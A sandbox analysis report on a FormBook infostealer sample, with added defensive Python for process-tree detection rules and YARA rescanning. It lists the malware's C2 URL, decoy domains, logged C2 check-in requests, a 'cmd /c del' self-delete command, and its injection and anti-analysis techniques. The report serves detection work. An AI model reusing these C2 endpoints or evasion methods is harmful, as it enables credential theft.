
Analysis Report g1EhgmCqCD.exe

Overview

General Information

Sample Name: g1EhgmCqCD.exe
Analysis ID: 404135
MD5: 5551346aa9f251895021b95a2a7cc390
SHA1: acbcecf7599d3c33f6f2a36c0947cfc633d0a406
SHA256: 9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • g1EhgmCqCD.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
    • g1EhgmCqCD.exe (PID: 1748 cmdline: C:\Users\user\Desktop\g1EhgmCqCD.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7028 cmdline: /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
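
The nesting above reflects injection, not process creation: the sandbox hangs explorer.exe under the second g1EhgmCqCD.exe because that child is hollowed and then injects into the already-running explorer.exe (see the "Sample uses process hollowing technique" and "Injects a PE file into a foreign processes" signatures), which in turn starts msiexec.exe from SysWOW64, and msiexec.exe finally runs cmd.exe /c del to remove the dropper. On an endpoint, process-creation telemetry therefore shows explorer.exe with its normal parent and msiexec.exe as its child; the link back to the sample is only visible in injection telemetry (Sysmon Event ID 8 or 10). The following added example (not part of the report) encodes three host-side rules over that tree in Python, using events reconstructed from the Startup section. The image paths of explorer.exe and cmd.exe and the explorer.exe parent (set to 0, unknown) are assumptions, since the report lists only PIDs, command lines and MD5s.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event with the fields Sysmon Event ID 1 or EDR telemetry provides."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Reconstructed from this report's Startup tree. Assumptions: the image paths of
# explorer.exe and cmd.exe (the report gives only PID, command line and MD5), and
# ppid 0 (unknown) for explorer.exe, because a host logs its real parent rather
# than the injecting sample the sandbox nests it under.
EVENTS = [
    ProcEvent(7100, 0, r"C:\Users\user\Desktop\g1EhgmCqCD.exe", r"'C:\Users\user\Desktop\g1EhgmCqCD.exe'"),
    ProcEvent(1748, 7100, r"C:\Users\user\Desktop\g1EhgmCqCD.exe", r"C:\Users\user\Desktop\g1EhgmCqCD.exe"),
    ProcEvent(3424, 0, r"C:\Windows\explorer.exe", ""),
    ProcEvent(7036, 3424, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(7028, 7036, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'"),
    ProcEvent(7116, 7028, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

USER_DIR_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
SYSWOW64_RE = re.compile(r"^[a-z]:\\windows\\syswow64\\", re.IGNORECASE)
# cmd.exe /c del <quoted or bare path ending in .exe>
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?\.exe)", re.IGNORECASE)


def _name(path):
    """File name of a Windows path, lower-cased (ntpath handles backslashes on any host)."""
    return ntpath.basename(path).lower()


def _has_no_args(ev):
    """True when the command line is empty or is just the image path (optionally quoted)."""
    cl = ev.cmdline.strip().strip("'\"")
    return cl == "" or cl.lower() == ev.image.lower()


def evaluate(events):
    """Run three FormBook-shaped rules over process-creation events.

    Returns (findings, chain): findings is a list of (rule_name, pid); chain is True
    when the executable that spawned a copy of itself is later deleted by cmd.exe,
    which ties the hollowing stage and the self-delete stage to one dropper.
    """
    by_pid = {e.pid: e for e in events}
    findings, self_spawned, deleted = [], set(), set()
    for ev in events:
        parent = by_pid.get(ev.ppid)
        # Rule 1: an executable under \Users\ starts a second copy of itself
        # (the suspended child that gets hollowed).
        if parent and USER_DIR_RE.match(ev.image) and ev.image.lower() == parent.image.lower():
            findings.append(("self_spawn_from_user_dir", ev.pid))
            self_spawned.add(ev.image.lower())
        # Rule 2: explorer.exe launches a 32-bit system binary with no arguments.
        # A user installing an MSI would produce msiexec.exe /i <package>, not a bare image.
        if parent and _name(parent.image) == "explorer.exe" and SYSWOW64_RE.match(ev.image) and _has_no_args(ev):
            findings.append(("explorer_spawns_wow64_binary_no_args", ev.pid))
        # Rule 3: cmd.exe /c del of an .exe under \Users\ (dropper self-delete).
        m = DEL_RE.search(ev.cmdline) if _name(ev.image) == "cmd.exe" else None
        if m and USER_DIR_RE.match(m.group(1)):
            findings.append(("cmd_deletes_user_executable", ev.pid))
            deleted.add(m.group(1).lower())
    return findings, bool(self_spawned & deleted)


if __name__ == "__main__":
    for finding in evaluate(EVENTS)[0]:
        print(*finding)
    print("chain:", evaluate(EVENTS)[1])
```

Rule 1 fires on PID 1748, rule 2 on PID 7036 and rule 3 on PID 7028; conhost.exe is the ordinary console host for cmd.exe and carries no signal. The report's Sigma section is empty, and this process-tree logic is what a rule for the chain would have to express: none of the three events is conclusive alone (self-spawn is common in installers, explorer launching a SysWOW64 binary happens for 32-bit tools), but the combination, keyed on the deleted path matching the self-spawned image, is specific to this dropper pattern.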

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(18 further memory-dump entries are not included in this extract)

Unpacked PEs

Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(1 further unpacked-PE entry is not included in this extract)
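
Both community rules match on short byte strings. The yara-signator $sequence_N strings are opcode runs; $sequence_0, 03 C8 0F 31 2B C1 89 45 FC, decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature. The JPCERT/CC $sqlite3* strings are each a single push imm32 instruction (opcode 68), named after the sqlite3 functions (step, text, blob) whose hashed names the immediates carry, consistent with FormBook resolving the browser-database API by hash rather than by import. The same strings hit at 0x85e8 in the .raw.unpack dump and at 0x77e8 in the .unpack dump, a constant shift of 0xe00 across all ten sequences, which is what a file-layout versus memory-layout difference looks like; expect a similar shift when comparing against your own dumps. The Python below is an added example (not part of the report and not the rules' own code): it parses match lines in the report's `0xoffset:$name: bytes` format, plants those strings at the listed offsets in a constructed buffer standing in for an .sdmp file, rescans it with a plain substring search, and decodes the push immediates.

```python
import re
import struct

# Match lines copied from the Memory Dumps section of this report for the first dump.
REPORT_LINES = [
    "0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC",
    "0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC",
    "0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07",
    "0x166a9:$sqlite3step: 68 34 1C 7B E1",
    "0x166d8:$sqlite3text: 68 38 2A 90 C5",
    "0x166eb:$sqlite3blob: 68 53 D8 7F 8C",
]

# <hex offset>:<$identifier>: <space-separated hex bytes>
LINE_RE = re.compile(r"^0x([0-9a-f]+):(\$\w+):\s*((?:[0-9A-F]{2}\s?)+)$")


def parse_report_lines(lines):
    """Return ({name: pattern_bytes}, {name: [offsets]}) from report match lines."""
    patterns, offsets = {}, {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised match line: %r" % line)
        off, name, hexbytes = int(m.group(1), 16), m.group(2), bytes.fromhex(m.group(3))
        patterns[name] = hexbytes
        offsets.setdefault(name, []).append(off)
    return patterns, offsets


def scan(buf, patterns):
    """Find every occurrence of each pattern; returns {name: [offsets]} in ascending order.

    This is the substring part of what YARA does for fixed hex strings; it is enough to
    re-check a rule hit against a raw dump without the yara module installed.
    """
    hits = {}
    for name, needle in patterns.items():
        found, pos = [], buf.find(needle)
        while pos != -1:
            found.append(pos)
            pos = buf.find(needle, pos + 1)
        hits[name] = found
    return hits


def push_imm32(pattern_bytes):
    """Decode a 5-byte 'push imm32' (opcode 0x68) to its little-endian immediate, else None."""
    if len(pattern_bytes) == 5 and pattern_bytes[0] == 0x68:
        return struct.unpack("<I", pattern_bytes[1:])[0]
    return None


def build_dump(patterns, placements, size=0x20000, fill=0xCC):
    """Constructed stand-in for a memory dump: int3 filler with the patterns planted
    at the offsets the report lists. Only for exercising scan(); real input is the
    .sdmp file itself."""
    buf = bytearray([fill]) * size
    for name, offs in placements.items():
        for off in offs:
            buf[off:off + len(patterns[name])] = patterns[name]
    return bytes(buf)


if __name__ == "__main__":
    pats, expected = parse_report_lines(REPORT_LINES)
    dump = build_dump(pats, expected)
    for name, offs in scan(dump, pats).items():
        line = ", ".join("0x%x" % o for o in offs)
        imm = push_imm32(pats[name])
        print(name, line, "" if imm is None else "push 0x%08X" % imm)
```

To use this against a real dump, read the .sdmp file as bytes and pass it to scan() with the patterns parsed from the report; agreement on both the pattern and the offset confirms you are looking at the same unpacked image the sandbox matched.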

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration identical to the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: g1EhgmCqCD.exe | VirusTotal: Detection: 19%
Source: g1EhgmCqCD.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: g1EhgmCqCD.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: g1EhgmCqCD.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Static PE characteristics and debug-symbol strings (signature names not preserved in this extract):
Source: g1EhgmCqCD.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msiexec.pdb | source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL | source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: g1EhgmCqCD.exe, msiexec.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.cats16.com/8u3b/
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.kayandbernard.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.palomachurch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.gb-contracting.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.effectivemarketinginc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.donelys.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.timbraunmusician.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.anygivenrunday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.2000deal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.kayandbernard.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.palomachurch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.gb-contracting.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.effectivemarketinginc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.donelys.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.timbraunmusician.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.anygivenrunday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.2000deal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.kayandbernard.com
Source: g1EhgmCqCD.exe, 00000001.00000003.651135793.0000000005B80000.00000004.00000001.sdmp | String found in binary or memory: http://en.wikip
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: g1EhgmCqCD.exe, 00000001.00000002.667858038.00000000029F1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000002.911535792.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com$d
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comI
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comfr
